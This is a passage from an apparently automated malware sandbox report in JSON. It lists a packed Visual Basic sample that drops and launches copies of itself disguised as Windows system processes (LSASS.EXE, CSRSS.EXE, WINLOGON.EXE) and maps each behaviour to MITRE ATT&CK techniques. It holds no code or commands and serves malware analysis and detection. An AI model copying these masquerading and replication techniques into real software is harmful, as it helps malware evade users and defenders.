00000000-00001480)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001480)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001480)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001480)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001480)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001480)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001480)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003628)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003628)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003628)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003628)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003628)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003628)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003628)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003628)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003628)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003628)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003628)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001476)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001476)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001476)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001476)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001476)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001476)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001476)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001476)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001476)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003948)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003948)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003948)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003948)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003948)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003948)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003948)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003948)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003948)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003576)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003576)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003576)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003576)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003576)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003576)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003576)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003576)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003576)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003576)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002580)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4k51k4.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4k51k4.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76620000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76620000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76620000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76620000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76620000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76620000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76620000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76620000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"4k51k4.exe\" (UID: 00000000-00006060)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005888)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005952)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005948)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004164)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006124)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00006056)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004240)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002532)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003812)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002828)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002852)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002832)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003980)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003688)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00000352)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002816)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003528)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004264)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003032)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004280)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003912)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00000344)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002240)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004132)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"4k51k4.exe\" (UID: 00000000-00006060)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005888)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005952)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005948)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004164)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006124)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00006056)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004240)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002532)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003812)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002828)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002852)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002832)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003980)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003688)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00000352)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002816)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003528)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004264)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003032)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004280)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003912)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00000344)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002240)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004132)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434\" was detected as \"UPX\" and name: \"Packer\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"services.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"services.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"services.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"shell.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"shell.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"shell.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4k51k4.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4k51k4.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4k51k4.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"New Folder.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"New Folder.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"New Folder.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Data HAPUBWS.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Empty.pif\" was detected as \"UPX\" and name: \"Packer\"\n \"Empty.pif\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Empty.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"WINLOGON.EXE.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"WINLOGON.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"WINLOGON.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4K51K4.EXE.67A9C450.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"4K51K4.EXE.67A9C450.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4K51K4.EXE.67A9C450.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SERVICES.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"SERVICES.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SERVICES.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67A9C452.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"IEXPLORER.EXE.67A9C452.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67A9C452.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"LSASS.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"LSASS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"LSASS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"MrHelloween.scr\" was detected as \"UPX\" and name: \"Packer\"\n \"MrHelloween.scr\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"MrHelloween.scr\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67A9C88D.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"IEXPLORER.EXE.67A9C88D.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67A9C88D.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4K51K4.EXE.67A9C740.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"4K51K4.EXE.67A9C740.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4K51K4.EXE.67A9C740.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"CSRSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67A9C743.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"IEXPLORER.EXE.67A9C743.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67A9C743.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"10001100f412fa74@rsaenh.dll\"\n \"15001600c03ed26b@ADVAPI32.dll\"\n \"0e000f00703fd26b@ADVAPI32.dll\"\n \"0e000f00cc3fd26b@ADVAPI32.dll\"\n \"11001200b447d26b@ADVAPI32.dll\"\n \"110012004848d26b@ADVAPI32.dll\"\n \"120013008c48d26b@ADVAPI32.dll\"\n \"12001300e448d26b@ADVAPI32.dll\"\n \"14001500386ed26b@ADVAPI32.dll\"\n \"14001500506ed26b@ADVAPI32.dll\"\n \"14001500686ed26b@ADVAPI32.dll\"\n \"17001800806ed26b@ADVAPI32.dll\"\n \"0d000e00986ed26b@ADVAPI32.dll\"\n \"11001200a86ed26b@ADVAPI32.dll\"\n \"11001200bc6ed26b@ADVAPI32.dll\"\n \"0f001000fc6fd26b@ADVAPI32.dll\"\n \"140015003c70d26b@ADVAPI32.dll\"\n \"140015005470d26b@ADVAPI32.dll\"\n \"0c000d009c70d26b@ADVAPI32.dll\"\n \"0c000d00ac70d26b@ADVAPI32.dll\"\n \"0e000f00bc70d26b@ADVAPI32.dll\"\n \"0e000f00cc70d26b@ADVAPI32.dll\"\n \"0b000c00dc70d26b@ADVAPI32.dll\"\n \"180019001473d26b@RPCRT4.dll\"\n \"130014004073d26b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateDirectoryA\" with parameter C:\\\\4K51K4 (UID: 00000000-00005064)\n \"4k51k4.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter C:\\\\4K51K4 (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\4K51K4 (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005888)\n \"WINLOGON.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004164)\n \"CSRSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004240)\n \"SERVICES.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002828)\n \"SERVICES.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00002828)\n \"LSASS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002816)\n \"LSASS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00002816)\n \"SMSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003912)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005064)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005888)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434\" has an executable section named \"UPX0\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434\" has an executable section named \"UPX1\"\n \"services.exe\" has an executable section named \"UPX0\"\n \"services.exe\" has an executable section named \"UPX1\"\n \"shell.exe\" has an executable section named \"UPX0\"\n \"shell.exe\" has an executable section named \"UPX1\"\n \"4k51k4.exe\" has an executable section named \"UPX0\"\n \"4k51k4.exe\" has an executable section named \"UPX1\"\n \"New Folder.exe\" has an executable section named \"UPX0\"\n \"New Folder.exe\" has an executable section named \"UPX1\"\n \"Data HAPUBWS.exe\" has an executable section named \"UPX0\"\n \"Data HAPUBWS.exe\" has an executable section named \"UPX1\"\n \"Empty.pif\" has an executable section named \"UPX0\"\n \"Empty.pif\" has an executable section named \"UPX1\"\n \"WINLOGON.EXE.bin\" has an executable section named \"UPX0\"\n \"WINLOGON.EXE.bin\" has an executable section named \"UPX1\"\n \"4K51K4.EXE.67A9C450.bin\" has an executable section named \"UPX0\"\n \"4K51K4.EXE.67A9C450.bin\" has an executable section named \"UPX1\"\n \"CSRSS.EXE.bin\" has an executable section named \"UPX0\"\n \"CSRSS.EXE.bin\" has an executable section named \"UPX1\"\n \"SERVICES.EXE\" has an executable section named \"UPX0\"\n \"SERVICES.EXE\" has an executable section named \"UPX1\"\n \"IEXPLORER.EXE.67A9C452.bin\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434\" has an writable section named \"UPX0\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434\" has an writable section named \"UPX1\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434\" has an writable section named \".rsrc\"\n \"services.exe\" has an writable section named \"UPX0\"\n \"services.exe\" has an writable section named \"UPX1\"\n \"services.exe\" has an writable section named \".rsrc\"\n \"shell.exe\" has an writable section named \"UPX0\"\n \"shell.exe\" has an writable section named \"UPX1\"\n \"shell.exe\" has an writable section named \".rsrc\"\n \"4k51k4.exe\" has an writable section named \"UPX0\"\n \"4k51k4.exe\" has an writable section named \"UPX1\"\n \"4k51k4.exe\" has an writable section named \".rsrc\"\n \"New Folder.exe\" has an writable section named \"UPX0\"\n \"New Folder.exe\" has an writable section named \"UPX1\"\n \"New Folder.exe\" has an writable section named \".rsrc\"\n \"Data HAPUBWS.exe\" has an writable section named \"UPX0\"\n \"Data HAPUBWS.exe\" has an writable section named \"UPX1\"\n \"Data HAPUBWS.exe\" has an writable section named \".rsrc\"\n \"Empty.pif\" has an writable section named \"UPX0\"\n \"Empty.pif\" has an writable section named \"UPX1\"\n \"Empty.pif\" has an writable section named 